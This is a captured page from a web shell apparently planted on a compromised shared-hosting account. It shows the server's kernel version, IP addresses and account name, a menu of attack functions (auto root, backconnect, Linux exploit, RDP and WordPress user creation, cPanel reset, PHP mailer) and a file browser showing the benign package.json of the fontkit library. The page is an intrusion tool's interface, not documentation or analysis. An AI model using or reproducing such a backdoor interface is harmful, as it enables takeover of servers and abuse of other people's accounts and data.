Linux premium131.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
LiteSpeed
: 162.0.232.56 | : 216.73.216.178
Cant Read [ /etc/named.conf ]
8.1.33
syrihapj
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
syrihapj /
public_html /
node_modules /
fontkit /
[ HOME SHELL ]
Name
Size
Permission
Action
node_modules
[ DIR ]
dr-xr-xr-x
src
[ DIR ]
dr-xr-xr-x
README.md
13.05
KB
-rw-r--r--
base.js
1.54
KB
-rw-r--r--
base.js.map
2.87
KB
-rw-r--r--
data.trie
526
B
-rw-r--r--
index.js
508.65
KB
-rw-r--r--
index.js.map
722.89
KB
-rw-r--r--
indic.trie
3.87
KB
-rw-r--r--
package.json
2.46
KB
-rw-r--r--
use.trie
3.52
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "fontkit", "version": "1.8.1", "description": "An advanced font engine for Node and the browser", "keywords": [ "opentype", "font", "typography", "subset", "emoji", "glyph", "layout" ], "scripts": { "test": "mocha", "prepublish": "run-s clean trie:** rollup:**", "trie:data": "babel-node src/opentype/shapers/generate-data.js", "trie:use": "babel-node src/opentype/shapers/gen-use.js", "trie:indic": "babel-node src/opentype/shapers/gen-indic.js", "trie:copy": "shx cp src/opentype/shapers/*.trie ./", "rollup:index": "rollup -c -m -i src/index.js -o index.js", "rollup:base": "rollup -c -m -i src/base.js -o base.js", "clean": "shx rm -f index.js base.js data.trie indic.trie use.trie src/opentype/shapers/data.trie src/opentype/shapers/use.trie src/opentype/shapers/use.json src/opentype/shapers/indic.trie src/opentype/shapers/indic.json", "coverage": "cross-env BABEL_ENV=cover nyc mocha" }, "main": "index.js", "jsnext:main": "src/index.js", "files": [ "src", "base.js", "base.js.map", "index.js", "index.js.map", "data.trie", "use.trie", "indic.trie" ], "author": "Devon Govett <devongovett@gmail.com>", "license": "MIT", "repository": { "type": "git", "url": "git://github.com/foliojs/fontkit.git" }, "dependencies": { "babel-runtime": "^6.26.0", "brfs": "^2.0.0", "brotli": "^1.2.0", "browserify-optional": "^1.0.1", "clone": "^1.0.4", "deep-equal": "^1.0.0", "dfa": "^1.2.0", "restructure": "^0.5.3", "tiny-inflate": "^1.0.2", "unicode-properties": "^1.2.2", "unicode-trie": "^0.3.0" }, "devDependencies": { "babel-cli": "^6.26.0", "babel-plugin-istanbul": "^4.1.6", "babel-plugin-transform-class-properties": "^6.16.0", "babel-plugin-transform-decorators-legacy": "^1.3.5", "babel-plugin-transform-runtime": "^6.12.0", "babel-preset-es2015": "^6.14.0", "babel-register": "^6.26.0", "codepoints": "^1.2.0", "concat-stream": "^1.6.2", "cross-env": "^5.0.1", "esdoc": "^0.4.8", "esdoc-es7-plugin": "0.0.3", "iconv-lite": "^0.4.24", "mocha": "^2.0.1", "npm-run-all": "^4.0.2", "nyc": "^10.3.2", "rollup": "^0.34.10", "rollup-plugin-babel": "^2.6.1", "rollup-plugin-json": "^2.3.1", "rollup-plugin-local-resolve": "^1.0.7", "shx": "^0.2.2" }, "browserify": { "transform": [ "brfs", "browserify-optional" ] } }
Close